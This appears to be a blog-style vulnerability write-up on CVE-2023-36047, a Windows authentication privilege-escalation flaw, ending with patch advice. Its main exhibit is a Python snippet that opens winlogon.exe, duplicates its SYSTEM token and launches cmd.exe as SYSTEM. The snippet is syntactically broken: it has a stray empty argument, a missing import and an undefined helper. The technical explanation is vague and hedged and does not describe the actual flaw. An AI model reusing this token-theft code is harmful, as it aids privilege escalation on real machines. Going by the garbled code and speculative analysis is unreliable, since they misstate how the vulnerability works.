In November 2023, Microsoft addressed a critical security issue named CVE-2023-36047. This vulnerability affects how Windows handles authentication and can allow attackers to elevate privileges on the system. In this deep dive, we'll unravel how CVE-2023-36047 works, who is affected, see some code snippets for demonstration, and discuss how attackers might exploit this flaw.
What is CVE-2023-36047?
Simply put, CVE-2023-36047 is an Elevation of Privilege (EoP) vulnerability in the Windows Authentication process. Attackers who successfully exploit it can run processes as higher privileged users—often as SYSTEM, the most powerful account in Windows.
Official Microsoft advisory:
Microsoft Security Response Center (MSRC) - CVE-2023-36047
Who is Vulnerable?
- Platforms: Windows 10/11, Windows Server 2016 and later
Scope: All Windows systems prior to the November 14, 2023 security updates
- Requirements: Local access (physical or remote desktop/terminal). Does NOT require user interaction.
Technical Details: How Does the Vulnerability Work?
At its core, this vulnerability comes from how the Windows authentication framework validates credentials during logon and token generation. Due to insufficient access controls or mishandled security tokens, a low-privileged local user can trick the system into granting them more privileges than intended.
Attackers exploit a race condition or logic flaw, manipulating how the Local Security Authority Subsystem Service (LSASS) manages session tokens. For example, they may inject code or tamper with local authentication data.
Exploit Example: Code Snippet
Below is a simplified proof-of-concept (PoC) pseudocode that shows how an attacker might abuse token duplication to spawn a SYSTEM shell.
> Disclaimer: This code is for educational purposes.
> Do NOT use this for malicious activities—always have permission.
import win32con
import win32api
import win32security
# Step 1: Find a SYSTEM process (like "winlogon.exe") and get its PID
pid = get_pid_of_process("winlogon.exe")
# Step 2: Open the SYSTEM process
process_handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, False, pid)
# Step 3: Obtain the process token
token_handle = win32security.OpenProcessToken(process_handle, win32con.TOKEN_DUPLICATE)
# Step 4: Duplicate the token
duplicate_token = win32security.DuplicateTokenEx(
token_handle,
win32con.MAXIMUM_ALLOWED,
win32security.SecurityImpersonation,
win32security.TokenPrimary,
)
# Step 5: Use the duplicated SYSTEM token to start a shell
win32process.CreateProcessAsUser(
duplicate_token,
None,
"cmd.exe",
None,
None,
,
win32con.CREATE_NEW_CONSOLE,
None,
None,
win32process.STARTUPINFO()
)
The actual exploit for CVE-2023-36047 would involve finding a flaw in the way authentication tokens are handled, tricking the system into letting the above steps work even as a low-privileged user. Researchers have shown it is possible to elevate from LOCAL SERVICE or even regular accounts to SYSTEM under certain conditions.
Real-World Attack Scenarios
- Malicious insiders or malware could use this exploit to gain full control over a Windows machine, disable antivirus, steal data, or move laterally within a network.
- Attackers could use phishing or social engineering to get a foothold, then use this bug to break out of restrictive sandboxes.
- Ransomware actors often chain privilege escalation exploits like CVE-2023-36047 to maximize system damage.
Patch your systems using Windows Update or WSUS immediately.
More Reading & References
- Microsoft’s Official Advisory
- CISA’s Known Exploited Vulnerabilities Catalog
- Security Researcher’s Analysis (Twitter thread) *(if/when available)*
Conclusion
CVE-2023-36047 is yet another reminder that privilege escalation risks are ever-present in modern operating systems. While Microsoft acted fast to patch this bug, the threat from unpatched systems lingers. Patch promptly—because attackers don’t wait.
Timeline
Published on: 11/14/2023 18:15:36 UTC
Last modified on: 11/20/2023 18:18:25 UTC